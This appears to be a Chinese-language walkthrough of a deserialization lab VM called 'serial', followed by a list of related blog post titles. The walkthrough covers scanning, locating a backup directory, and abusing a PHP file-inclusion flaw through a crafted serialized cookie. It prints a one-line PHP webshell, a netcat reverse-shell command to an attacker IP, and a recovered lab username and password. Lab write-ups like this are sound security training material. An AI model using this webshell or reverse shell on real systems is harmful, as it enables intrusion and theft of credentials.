反序列化靶机-serial攻略

1、打开虚拟机

2、扫描活跃的IP和端口

3、访问并查看页面源码

4、使用burpsuite解码,发现其为对象序列化的输出结果

5、扫描目录,找到隐藏目录/backup/

6、访问

7、下载bak.zip,解压发现3个php文件

8、查看代码,发现index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出

9、get shell

制作一句话木马

<?php system($_GET['cmd']);?>

10、构造payload

11、访问192.168.3.179/4.php,将回显的base64编码后序列化的输出结果复制

12、添加反弹shell:

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.0.102+4444+>/tmp/f

13、反弹成功

14、cd /,然后ls

15、cat credentials.txt.bak

16、账号:sk4 密码:KywZmnPWW6tTbW5w

相关推荐
weixin_4723394615 分钟前
网络安全基石:从弱口令治理到动态防御体系的构建
安全·web安全
代码改变世界ctw26 分钟前
1.4 ARM安全参考架构(PSA Certified)
arm开发·安全·arm·trustzone·atf·optee·安全启动
网安小白的进阶之路6 小时前
A模块 系统与网络安全 第四门课 弹性交换网络-2
网络·安全·web安全·系统安全·交换机
安全系统学习6 小时前
网络安全之RCE分析与利用详情
服务器·网络·安全·web安全·系统安全
武汉唯众智创6 小时前
网络安全实训室建设方案全攻略
网络·安全·web安全·网络安全·网络安全实训室·网络安全实验室
weixin_472339466 小时前
网络安全攻防:文件上传漏洞的深度解析与防御实践
安全·web安全
雪兽软件6 小时前
2025 年网络安全与人工智能发展趋势
人工智能·安全·web安全
小黄人20257 小时前
自动驾驶安全技术的演进与NVIDIA的创新实践
人工智能·安全·自动驾驶
CS创新实验室8 小时前
筑牢 AIGC 安全防线:警惕提示词注入攻击
安全·大模型·aigc·提示词·提示词注入
宝山哥哥9 小时前
网络信息安全学习笔记1----------网络信息安全概述
网络·笔记·学习·安全·网络安全